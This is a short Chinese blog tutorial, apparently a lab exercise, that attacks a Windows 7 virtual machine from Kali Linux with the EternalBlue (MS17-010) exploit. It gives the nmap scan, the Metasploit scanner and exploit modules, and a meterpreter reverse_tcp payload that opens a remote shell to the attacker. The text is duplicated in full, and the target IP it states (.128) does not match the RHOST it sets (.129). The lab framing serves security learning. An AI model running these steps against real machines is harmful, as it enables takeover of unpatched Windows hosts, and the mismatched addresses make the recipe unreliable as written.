admin管理员组文章数量:1130349
kali Eternalblue to win7
实验准备
攻击机: kali , IP: 192.168.226.130
靶机:win7 , IP: 192.168.226.128
实验过程
关闭win7防火墙,开放445,139端口
扫描以下,查看端口情况
$ sudo nmap -sV -A -O 192.168.226.128
启动msfconsole
$ msfconsole
使用auxiliary/scanner/smb/smb_ms17_010监测ms17_010是否可用
$ use auxiliary/scanner/smb/smb_ms17_010
主机很有可能具有ms17-010的漏洞,可攻击
开始攻击
$ use exploit/windows/smb/ms17_010_eternalblue
$ set RHOST 192.168.226.129 //靶机
$ set LHOST 192.168.226.130 // 攻击机
$ set payload windows/x64/meterpreter/reverse_tcp
$run
成功
欢迎交流指正!
kali Eternalblue to win7
实验准备
攻击机: kali , IP: 192.168.226.130
靶机:win7 , IP: 192.168.226.128
实验过程
关闭win7防火墙,开放445,139端口
扫描以下,查看端口情况
$ sudo nmap -sV -A -O 192.168.226.128
启动msfconsole
$ msfconsole
使用auxiliary/scanner/smb/smb_ms17_010监测ms17_010是否可用
$ use auxiliary/scanner/smb/smb_ms17_010
主机很有可能具有ms17-010的漏洞,可攻击
开始攻击
$ use exploit/windows/smb/ms17_010_eternalblue
$ set RHOST 192.168.226.129 //靶机
$ set LHOST 192.168.226.130 // 攻击机
$ set payload windows/x64/meterpreter/reverse_tcp
$run
成功
欢迎交流指正!
本文标签: kaliEternalBlue
版权声明:本文标题:Kali 使用永恒之蓝Eternalblue攻击win7 内容由热心网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:https://it.en369.cn/jiaocheng/1754830019a2731412.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。


发表评论